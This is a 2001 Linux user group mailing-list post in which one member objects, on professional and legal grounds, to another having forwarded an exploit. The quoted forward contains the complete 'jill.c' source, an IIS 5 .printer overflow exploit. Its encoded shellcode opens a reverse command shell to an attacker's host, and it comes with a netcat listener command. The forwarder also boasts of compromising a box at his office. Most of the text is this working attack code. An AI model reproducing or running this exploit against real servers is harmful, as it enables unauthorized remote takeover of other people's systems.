just incase you missed it
George Toft
plug-discuss@lists.PLUG.phoenix.az.us
Tue, 08 May 2001 02:04:48 -0700
In the interest of maintaining a professional list, and a professional
image, I would appreciate this type of posting not continue. It has no
place here. There are plenty of sites out there where we can get this
stuff if we were so inclined. Highlighting Microsoft's inability to
patch the same overflow from one IIS version to the next does not
favorably promote Linux at all - in fact, it continues the negative
"Hacker OS" image that so many are working to overcome.
Perhaps I'm showing my age, but I don't see how making some underpaid[1]
NT admin's life miserable by "0wning hiz b0x with a r00t wind0w" does
him any good. Sure, he looks like a moron to his boss, and they'll
patch the OS (if they're lucky[2]), or pay some overpaid MCSE shyster to
do it for them.
It also does not reflect well on you, as all you are doing is passing
on someone else's work, just like a script-kiddie. This post would be
educational if you were to disassemble the embedded hex in unsigned
char sploit and discuss in detail how and why it works. (Not simply
"it overruns the print buffer and sends me a console" - I got that much
from the SANS and Security Portal e-mails.)
Anyone considering using this code might want to consider the
ramifications of the Computer Fraud and Abuse Act[3]. Personally, I
have more ambition than becoming Bubba's newest conquest.
Yes, I was offended.
George
References:
1. SANS Salary Survey,
http://www.sans.org/newlook/publications/salary2000.htm, note 10.
2. Security Portal,
http://securityportal.com/articles/ntspseven20010507.html
3. Computer Fraud and Abuse Act, 18 U.S.C. § 1030
Nigel Sollars wrote:
> Hi,
>
> Just incase you missed this one here is the jill code .. the IIS5 printer
> overflow exploit ...
>
> Ive done a box here at the office .. hehe brings the term got root? to a
> reality.
>
> Nige..
>
> code as follows :-
>
> IIS 5 remote .printer overflow. "jill.c" (don't ask).
> *
> * by: dark spyrit <dspyrit@beavuh.org>
> *
> * respect to eeye for finding this one - nice work.
> * shouts to halvar, neofight and the beavuh bitchez.
> *
> * this exploit overwrites an exception frame to control eip and get to
> * our code.. the code then locates the pointer to our larger buffer and
> * execs.
> *
> * usage: jill <victim host> <victim port> <attacker host> <attacker port>
> *
> * the shellcode spawns a reverse cmd shell.. so you need to set up a
> * netcat listener on the host you control.
> *
> * Ex: nc -l -p <attacker port> -vv
> *
> * I haven't slept in years.
> */
>
> #include <sys/types.h>
> #include <sys/time.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <arpa/inet.h>
> #include <unistd.h>
> #include <errno.h>
> #include <stdlib.h>
> #include <stdio.h>
> #include <string.h>
> #include <fcntl.h>
> #include <netdb.h>
>
> int main(int argc, char *argv[]){
>
> /* the whole request rolled into one, pretty huh? carez. */
>
> unsigned char sploit[]=
> "\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
> "\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
> "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
> "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
> "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
> "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
> "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
> "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
> "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
> "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
> "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
> "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
> "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
> "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
> "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
> "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
> "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
> "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
> "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
> "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
> "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
> "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
> "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
> "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
> "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
> "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
> "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
> "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
> "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
> "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
> "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
> "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
> "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
> "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
> "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
> "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
> "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
> "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
> "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
> "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
> "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
> "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
> "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
> "\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
> "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
> "\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";
>
> int s;
> unsigned short int a_port;
> unsigned long a_host;
> struct hostent *ht;
> struct sockaddr_in sin;
>
> printf("iis5 remote .printer overflow.\n"
> "dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n");
>
> if (argc != 5){
> printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>\n",argv[0]);
> exit(1);
> }
>
> if ((ht = gethostbyname(argv[1])) == 0){
> herror(argv[1]);
> exit(1);
> }
>
> sin.sin_port = htons(atoi(argv[2]));
> a_port = htons(atoi(argv[4]));
> a_port^=0x9595;
>
> sin.sin_family = AF_INET;
> sin.sin_addr = *((struct in_addr *)ht->h_addr);
>
> if ((ht = gethostbyname(argv[3])) == 0){
> herror(argv[3]);
> exit(1);
> }
>
> a_host = *((unsigned long *)ht->h_addr);
> a_host^=0x95959595;
>
> sploit[441]= (a_port) & 0xff;
> sploit[442]= (a_port >> 8) & 0xff;
>
> sploit[446]= (a_host) & 0xff;
> sploit[447]= (a_host >> 8) & 0xff;
> sploit[448]= (a_host >> 16) & 0xff;
> sploit[449]= (a_host >> 24) & 0xff;
>
> if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
> perror("socket");
> exit(1);
> }
>
> printf("\nconnecting... \n");
>
> if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
> perror("connect");
> exit(1);
> }
>
> write(s, sploit, strlen(sploit));
> sleep (1);
> close (s);
>
> printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
> exit(0);
> }
> ________________________________________________
> See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
>
> PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
--
"Fate, it seems, is not without a sense of irony" - Morpheus